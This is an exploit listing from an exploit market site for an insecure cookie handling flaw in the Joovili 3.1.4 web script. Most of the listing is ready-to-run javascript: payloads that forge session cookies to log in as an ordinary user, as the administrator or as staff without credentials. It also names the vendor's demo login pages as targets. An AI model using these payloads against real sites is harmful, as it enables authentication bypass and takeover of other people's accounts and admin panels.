[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joovili 3.1.4 Insecure Cookie Handling Vulnerability

Author
ZoRLu
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4035
Category
web applications
Date add
02-11-2008
Platform
unsorted
====================================================
Joovili 3.1.4 Insecure Cookie Handling Vulnerability
====================================================


[~] Joovili Script Insecure Cookie Handling Vulnerability
[~]
[~] version: 3.1.4 
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 02.11.2008
[~] 
[~] N0T: a.q kpss : ) )
[~]
[~] ----------------------------------------------------------

demo admin login:

http://demo.joovili.com/admin

demo user login:

http://demo.joovili.com/

demo staff login:

http://demo.joovili.com/staff/


exploit for user:

javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/"; 


for demo user:

javascript:document.cookie = "session_id=304; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=demo; path=/";

for demo admin:

javascript:document.cookie = "session_admin_id=1; path=/"; document.cookie = "session_admin_username=admin; path=/"; document.cookie = "session_admin=true; path=/";

for demo staff:

javascript:document.cookie = "session_staff_id=3; path=/"; document.cookie = "session_staff_username=staff; path=/"; document.cookie = "session_staff=true; path=/";

[~]----------------------------------------------------------------------



#  0day.today [2024-11-15]  #